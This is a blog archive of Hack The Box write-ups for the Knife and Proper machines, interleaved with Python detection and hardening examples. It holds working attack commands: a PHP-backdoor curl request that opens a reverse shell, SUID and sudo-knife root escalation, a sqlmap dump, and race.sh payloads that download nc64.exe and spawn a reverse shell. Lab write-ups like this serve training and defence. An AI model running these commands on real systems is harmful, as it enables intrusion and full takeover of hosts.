Month: May 2021
Protected: pg-flasky-private
Protected: htb-context-private
Protected: htb-ascension-private
Protected: pg-fail-private
htb-knife-private
Introduction@Knife:~$
Column | Details |
---|---|
Name | Knife |
IP | 10.10.10.242 |
Points | 20 |
OS | Linux |
Difficulty | Easy |
Creator | MrKN16H |
Out On | 22 May 2021 |
Recon
Nmap
Let’s first start with port 80.
Port-80
There is a simple HTML page. None of the links work either. When I go to the debugger tab I see a JS file called pen.js, but there is nothing interesting in it. I also ran gobuster, but it found nothing.
Let’s try with Burp and check the response headers. We get a PHP version, "PHP/8.1.0-dev"; let’s search Google for an exploit for this specific version.
Let’s follow the article and check whether it works or not. I capture the request to port 80, send it to Repeater and add the User-Agentt header. If this works we get the output int(6). It works, so let’s execute commands with zerodiumsystem.
We get the output as the james user; let’s try to get a reverse shell. But first start the netcat listener on port 9001. Now let’s add the bash reverse shell command in User-Agentt. The response does not come back, which means the page is hanging; let’s check the netcat listener. And we got the shell and our user.txt file.
Or just with curl:
┌─[✗]─[puck@parrot-lt]─[~/htb/knife]
└──╼ $curl http://10.10.10.242/index.php -H "User-Agentt: zerodiumsystem(\"bash -c 'bash -i &>/dev/tcp/10.10.14.3/1234 0>&1 '\");"
┌─[puck@parrot-lt]─[~/htb]
└──╼ $nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.242] 43870
bash: cannot set terminal process group (983): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$
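The backdoored build is easy to spot from either direction of the traffic. As an added example (not code from this writeup), here is a small Python checker that parses raw HTTP messages and flags the two signatures the writeup relies on: a User-Agentt header whose value starts with zerodium, and an X-Powered-By: PHP/8.1.0-dev response header. The sample requests and response are constructed; the host name, server banner and user agents in them are placeholders.

```python
"""Flag the two on-the-wire signatures of the PHP 8.1.0-dev backdoor the
writeup exploited: a request header spelled User-Agentt whose value starts with
"zerodium", and a response that advertises the build in X-Powered-By. Added
example, not code from the writeup; sample messages below are constructed."""
import re
from typing import Dict, List, Tuple

BACKDOOR_HEADER = "user-agentt"                       # misspelled header that triggers the hook
BACKDOOR_MARKER = re.compile(r"^\s*zerodium", re.IGNORECASE)
VULNERABLE_BUILD = "PHP/8.1.0-dev"                    # as seen in the X-Powered-By header


def parse_headers(raw: str) -> Tuple[str, Dict[str, List[str]]]:
    """Split a raw HTTP message into its start line and a header map.

    Names are lower-cased and repeated headers are kept as lists, so a
    second, misspelled User-Agent cannot hide behind the legitimate one.
    """
    text = raw.replace("\r\n", "\n")
    head = text.split("\n\n", 1)[0]
    lines = [ln for ln in head.split("\n") if ln]
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue                                   # tolerate junk, do not crash the pipeline
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return (lines[0] if lines else ""), headers


def flag_request(raw: str) -> List[str]:
    """Findings for one inbound request; an empty list means nothing suspicious."""
    start, headers = parse_headers(raw)
    findings = []
    if BACKDOOR_HEADER in headers:
        findings.append(f"backdoor trigger header User-Agentt present on: {start}")
    for name, values in headers.items():
        for value in values:
            if BACKDOOR_MARKER.search(value):
                findings.append(f"zerodium marker in header {name!r}: {value[:60]}")
    return findings


def flag_response(raw: str) -> List[str]:
    """Findings for an outbound response that exposes the backdoored build."""
    _, headers = parse_headers(raw)
    return [f"server advertises backdoored build: {v}"
            for v in headers.get("x-powered-by", []) if VULNERABLE_BUILD in v]


# Constructed sample traffic (placeholder host and banner; not captured from the box).
BENIGN_REQUEST = ("GET /index.php HTTP/1.1\r\n"
                  "Host: www.example\r\n"
                  "User-Agent: Mozilla/5.0\r\n\r\n")
PROBE_REQUEST = ("GET /index.php HTTP/1.1\r\n"
                 "Host: www.example\r\n"
                 "User-Agent: curl/7.74.0\r\n"
                 'User-Agentt: zerodiumsystem("id");\r\n\r\n')
BANNER_RESPONSE = ("HTTP/1.1 200 OK\r\n"
                   "Server: Apache/2.4.41 (Ubuntu)\r\n"
                   "X-Powered-By: PHP/8.1.0-dev\r\n"
                   "Content-Type: text/html\r\n\r\n<html></html>")

if __name__ == "__main__":
    for label, raw in (("benign request", BENIGN_REQUEST), ("probe request", PROBE_REQUEST)):
        print(f"{label}: {flag_request(raw) or 'clean'}")
    print(f"response: {flag_response(BANNER_RESPONSE) or 'clean'}")
```

The header check fires on the header name alone, so it also catches probes that use a different prefix; the marker check catches the value wherever it is placed. The response check is the cheap preventive one: a production site should never answer with a -dev build string at all.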
Let’s get an SSH shell before proceeding to privilege escalation. For that we need to add our SSH public key inside james’s .ssh folder. First create an SSH key with ssh-keygen. Now add this id_rsa.pub key to authorized_keys. Now let’s try to log in through SSH.
Privilege Escalation
If we look in our home folder there is a Ruby file called ex.rb. The Ruby file just reads the /etc/shadow file, but we can’t execute it because Ruby is not installed on the system.

Let’s try the sudo -l command. When we run sudo -l there is a file called knife which we can run with sudo privileges, and when we look at /usr/bin/knife we see it is a symlink to /opt/chef-workstation/bin/knife. When we go inside the /opt/chef-workstation directory we learn that it is a Ruby installation directory. That means we can execute Ruby files and commands with /usr/bin/knife rather than with the ruby command, which is why we couldn’t execute ex.rb in james’s home directory.

Now that we can run Ruby files, let’s run ex.rb from james’s home directory. We can cat the /etc/shadow file; now let’s create a file to get root privileges. In the Ruby file I simply set the SUID bit on /bin/bash so the james user can easily execute root commands and get our root.txt.

And we pwned it.
Quicker: the output shows that james is allowed to run knife as root. The knife tool provides an interface to manage Chef automation server nodes, cookbooks, recipes, etc. Knife usage can be read at https://manpages.ubuntu.com/manpages/bionic/man1/knife.1.html. Some examples show that it is possible to edit knife data bags using a text editor. We can try that: `sudo knife data bag create 1 2 -e vi`. This opens up the vim editor. We type `:!/bin/sh` in the editor to get a shell as root.
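Both halves of the privilege escalation above leave auditable traces: a sudo rule whose target is a symlink into a scripting runtime, and a SUID bit on /bin/bash afterwards. The following Python is an added example (not the writeup’s or Chef’s code) that parses `sudo -l` output, follows symlinks through a caller-supplied map, and diffs SUID files against a baseline. The `sudo -l` text, the symlink map, the file listing and the baseline are constructed to match what the writeup describes; on a live host the listing would come from os.walk plus os.lstat and the map from os.readlink.

```python
"""Audit the two conditions the escalation above relied on: a sudo rule that
hands root to a binary which is really a symlink into a scripting runtime, and a
SUID bit appearing on /bin/bash afterwards. Added example, not the writeup's
code; sudo -l text, symlink map, file listing and baseline are constructed."""
import os
import re
import stat
from typing import Dict, Iterable, List, Tuple

# One rule line as sudo -l prints it: "(runas) TAG: TAG: /path/to/cmd args"
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")
# Runtimes that execute arbitrary code for whoever may run them as root
# (knife included: the writeup uses it to run Ruby from /opt/chef-workstation).
INTERPRETERS = {"ruby", "python", "python3", "perl", "php", "node", "knife", "bash", "sh"}
# Where a package-managed, root-owned binary is expected to live.
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/")


def parse_sudo_l(output: str) -> List[Tuple[str, str, bool]]:
    """Extract (run-as user, command, NOPASSWD?) from `sudo -l` output."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        m = SUDO_RULE.match(line) if in_rules else None
        if m:
            rules.append((m.group("runas"), m.group("cmd"), "NOPASSWD:" in m.group("tags")))
    return rules


def resolve_target(path: str, link_map: Dict[str, str]) -> str:
    """Follow symlinks via a caller-supplied map (use os.readlink on a live host)."""
    seen = set()
    while path in link_map and path not in seen:
        seen.add(path)
        target = link_map[path]
        if not os.path.isabs(target):
            target = os.path.join(os.path.dirname(path), target)
        path = os.path.normpath(target)
    return path


def audit_sudo_rules(output: str, link_map: Dict[str, str]) -> List[str]:
    """Flag rules whose real target is an interpreter or sits outside trusted dirs."""
    findings = []
    for runas, cmd, nopasswd in parse_sudo_l(output):
        if cmd == "ALL":
            findings.append(f"({runas}) may run ALL")
            continue
        binary = cmd.split()[0]
        real = resolve_target(binary, link_map)
        reasons = []
        if real != binary:
            reasons.append(f"symlink to {real}")
        if not real.startswith(TRUSTED_PREFIXES):
            reasons.append("target outside package-managed directories")
        if os.path.basename(real) in INTERPRETERS:
            reasons.append("target is a scripting runtime")
        if reasons:
            tag = "NOPASSWD" if nopasswd else "password required"
            findings.append(f"({runas}) {cmd} [{tag}]: " + "; ".join(reasons))
    return findings


def unexpected_suid(entries: Iterable[Tuple[str, int]], baseline: Iterable[str]) -> List[str]:
    """Return SUID/SGID paths from (path, st_mode) pairs that are not in the baseline."""
    allowed = set(baseline)
    return sorted(p for p, mode in entries
                  if mode & (stat.S_ISUID | stat.S_ISGID) and p not in allowed)


# Constructed sudo -l output in sudo's format, modelled on the rule the writeup describes.
SUDO_OUTPUT = """Matching Defaults entries for james on knife:
    env_reset, mail_badpass

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""
# Constructed symlink map: the writeup found /usr/bin/knife pointing into /opt/chef-workstation.
LINKS = {"/usr/bin/knife": "/opt/chef-workstation/bin/knife"}
# Constructed (path, st_mode) listing; the SUID bit on /bin/bash is the post-exploitation artefact.
LISTING = [("/usr/bin/sudo", 0o104755), ("/usr/bin/passwd", 0o104755),
           ("/bin/bash", 0o104755), ("/bin/ls", 0o100755)]
BASELINE = ["/usr/bin/sudo", "/usr/bin/passwd"]

if __name__ == "__main__":
    for finding in audit_sudo_rules(SUDO_OUTPUT, LINKS) + unexpected_suid(LINKS and LISTING, BASELINE):
        print("FINDING:", finding)
```

The sudo check deliberately resolves the link before judging the rule: a rule that reads `/usr/bin/knife` looks like a normal package binary until the resolved path and the interpreter list say otherwise. The SUID diff is the cheap periodic control that would have caught the ex.rb step on its next run.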
Resources
Topic | Url |
---|---|
PHP 8.1.0-dev development version backdoor | https://blog.csdn.net/zy15667076526/article/details/116447864 |
htb-proper-nl
HTB – Proper
We can dump with:
┌──(kali㉿kali)-[~/htb/proper]
└─$ sqlmap -u "http://proper.htb/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b" --eval="import hashlib ; h=hashlib.md5(('hie0shah6ooNoim'+order).encode('utf-8')).hexdigest()" --batch --threads=10 --dump
Then a dirb scan:
┌──(kali㉿kali)-[~/…/output/proper.htb/dump/cleaner]
└─$ dirb http://proper.htb/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri May 21 02:21:54 2021
URL_BASE: http://proper.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://proper.htb/ ----
==> DIRECTORY: http://proper.htb/assets/
+ http://proper.htb/index.html (CODE:200|SIZE:14257)
==> DIRECTORY: http://proper.htb/licenses/
---- Entering directory: http://proper.htb/assets/ ----
==> DIRECTORY: http://proper.htb/assets/api/
We can then log in at http://proper.htb/licenses/licenses.php and view licenses, nothing more.
┌──(kali㉿kali)-[~/htb/proper]
└─$ cat read2.sh
#!/bin/bash
HOST=10.10.10.231
SALT=hie0shah6ooNoim
TRAV=$1
USER=vikki.solomon@throwaway.mail
PASS=password1
COOKIE=$(mktemp -u)
PROXY=127.0.0.1:8080
# login: fetch the form for a session cookie, then post the credentials
curl -c $COOKIE -s -o /dev/null http://$HOST/licenses/index.php
curl -s \
-b $COOKIE \
-o /dev/null \
-d "username=${USER}&password=${PASS}" \
http://$HOST/licenses/index.php
# SMB RFI: the theme value plus its md5(SALT+theme) integrity parameter, sent through the proxy
curl -s \
-b $COOKIE \
-G \
-d "theme=${TRAV}" \
-d "h=$(echo -n ${SALT}${TRAV} | md5sum | cut -d' ' -f1)" \
-o /dev/null \
-x $PROXY \
http://$HOST/licenses/licenses.php
# clean up
rm -rf $COOKIE
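read2.sh works because the theme parameter is concatenated into an include path, so a traversal string or a UNC path to an attacker-controlled SMB share is enough to include a remote file. The application’s PHP is not on the page, so the following Python is an added example (not the application’s code) of how that lookup should be constrained, assuming a themes/<name>/header.inc layout under an assumed theme root and an assumed allowlist of deployed themes. The check_include_bytes helper also addresses the race.sh loop: whatever check the application applied to header.inc before including it (assumed here to be a scan for PHP tags) has to run on the same bytes that are rendered, not on a second read.

```python
"""Constrain the `theme` lookup that read2.sh abuses. Added example, not the
application's code: the PHP side is not on the page, so the layout
themes/<name>/header.inc, the theme root and the allowlist are assumptions."""
import os
import re
from typing import FrozenSet, Optional

THEME_ROOT = "/var/www/html/licenses/themes"                   # assumed location
THEME_NAME = re.compile(r"^[a-z0-9_-]{1,32}$")                 # no '.', '/' or '\\' possible
KNOWN_THEMES: FrozenSet[str] = frozenset({"default", "dark"})  # assumed deployed themes


class ThemeRejected(ValueError):
    """Raised for any theme value that must not reach an include statement."""


def resolve_theme(name: str, root: str = THEME_ROOT,
                  allowlist: FrozenSet[str] = KNOWN_THEMES) -> str:
    """Return the absolute header.inc path for `name` or raise ThemeRejected.

    Three independent layers: a strict character set (removes '..', path
    separators and the leading backslashes of a UNC path), an explicit set of
    deployed themes, and a containment check on the normalised result so a
    slip in the first two still cannot leave the theme root.
    """
    if not THEME_NAME.match(name):
        raise ThemeRejected(f"illegal characters in theme name: {name!r}")
    if name not in allowlist:
        raise ThemeRejected(f"unknown theme: {name!r}")
    root = os.path.normpath(root)
    candidate = os.path.normpath(os.path.join(root, name, "header.inc"))
    if os.path.commonpath([root, candidate]) != root:
        raise ThemeRejected(f"resolved path escapes theme root: {candidate}")
    return candidate


def is_accepted(name: str) -> bool:
    """Predicate form of resolve_theme for validation and tests."""
    try:
        resolve_theme(name)
        return True
    except ThemeRejected:
        return False


def theme_or_default(name: Optional[str]) -> str:
    """Request-handler behaviour: fall back to the default theme, never to user input."""
    try:
        return resolve_theme(name or "default")
    except ThemeRejected:
        return resolve_theme("default")


def check_include_bytes(data: bytes) -> str:
    """Validate include content on the exact bytes that will be rendered.

    The race.sh loop alternates a harmless file with a PHP payload; it only
    wins if the application checks the file on one read and includes it on a
    second (assumed here). Doing the check and the use on one buffer removes
    that window; PHP open tags are the assumed marker being checked for.
    """
    if b"<?" in data:
        raise ThemeRejected("include contains PHP code, refusing to render it")
    return data.decode("utf-8", errors="replace")


def include_is_safe(data: bytes) -> bool:
    """Predicate form of check_include_bytes."""
    try:
        check_include_bytes(data)
        return True
    except ThemeRejected:
        return False


def read_include_once(path: str) -> str:
    """Read header.inc once and validate the same buffer that is rendered."""
    with open(path, "rb") as fh:
        return check_include_bytes(fh.read())


if __name__ == "__main__":
    for probe in ("default", "../../../../evil", "\\\\10.0.0.1\\share\\evil", "DEFAULT"):
        print(f"{probe!r:32} -> {'accepted' if is_accepted(probe) else 'rejected'}")
    print(theme_or_default("..\\..\\x"))
```

Note that os.path.normpath on Linux does not treat backslashes as separators, which is exactly why the character allowlist comes first: the containment check alone would let a UNC-style value through as an odd-looking file name, and a PHP include on Windows would then interpret it as a network path.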
┌──(kali㉿kali)-[~/htb/proper]
└─$ cat race.sh
#!/bin/bash
# keep rewriting header.inc, alternating harmless content with the payload
PAYLOAD=$1
while :; do
echo hello world > header.inc
echo "$PAYLOAD" > header.inc
done
sudo python3 smbserver.py -ip 10.10.14.23 -smb2support evil .
sudo python3 smbserver.py -username web -password 'charlotte123!' -ip 10.10.14.23 -smb2support evil .
./race.sh '<?php system("cmd /c powershell iwr http://10.10.14.73/nc64.exe -outf \windows\system32\spool\drivers\color\cute.exe"); ?>'
./race.sh '<?php system("cmd /c start \windows\system32\spool\drivers\color\cute.exe 10.10.14.73 1234 -e cmd.exe"); ?>'